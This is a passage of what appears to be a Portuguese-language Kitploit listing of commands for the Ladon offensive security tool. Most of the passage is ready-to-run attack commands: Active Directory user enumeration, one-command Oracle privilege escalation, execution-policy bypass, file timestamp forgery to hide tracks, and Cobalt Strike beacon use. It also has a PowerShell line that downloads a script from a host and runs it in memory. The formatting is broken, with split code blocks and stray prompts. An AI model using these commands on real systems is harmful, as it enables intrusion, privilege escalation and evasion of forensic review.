256 DomainLog DomainUserIP consulta remota de IP de usuário de domínio```Bash
root@kitploit:~
   Ladon DomainLog -d 7
   Ladon DomainLog -h ip -d 7
   Ladon DomainLog -h ip -d 7 -grep user
   Ladon DomainLog -h ip -u username -p password -d 7
   Ladon DomainLog -h ip -u username -p password -d 7 -all
   Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res

ult.txt

root@kitploit:~
##### 257 Verificar se o usuário é administrador do Lotus```Bash	
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
258 Servidor HTA inicialização com um clique: acessar o DOC também pode executar HTA```Bash

Ladon HtaSer Ladon HtaSer 8080

root@kitploit:~
##### 259 ConfVer ConfluenceVer detectar versão do Confluence```Bash	
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
260 FindAD pode ser usado para encontrar a localização de logins de usuários do Active Directory, enumerar usuários do domínio```Bash

Ladon FindAD Ladon pveFindADUser

root@kitploit:~
##### 261 Ferramenta de escalonamento de privilégios remoto do Oracle Database Driver oficial >=.net 4.8```Bash	
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
262 Ferramenta de escalonamento de privilégios remotos do Oracle 3 métodos de escalonamento de privilégios com um clique```Bash

Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami

root@kitploit:~
##### BuildCS compilação dinâmica de arquivos de código C#```Bash	
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
Modificar tempo do arquivo, especificar tempo do arquivo

Usage: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"

root@kitploit:~
##### Modificar tempo do arquivo Copiar tempo do arquivo```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe

Versão PowerShell Ladon.ps1

0x001 Execução Interativa Cmd```Bash

powershell Import-Module .\Ladon.ps1 Ladon OnlinePC

root@kitploit:~
#### 0x002 Execução Local Não Interativa```Bash	
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

0x003 Execução de carregamento remoto de memória```Bash

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"

root@kitploit:~
#### 0x004 Bypass da execução da política padrão do PowerShell```Bash	
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

0x005 Varredura de portas personalizada```Bash

powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
### Cobalt Strike  Ladon.ps1

CS Beacon detecta hosts ativos```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo

CS Beacon Varredura de portas personalizada```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
CS Beacon MS17010 - Detecção de vulnerabilidade```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010

=======================================================

Exemplo

http://k8gege.org/Ladon/example-en.html

Última versão

Última versão em small seal ring: http://k8gege.org/Ladon/update.txt

Estrelas ao longo do tempo

Estrelas ao longo do tempo

Baixar ferramenta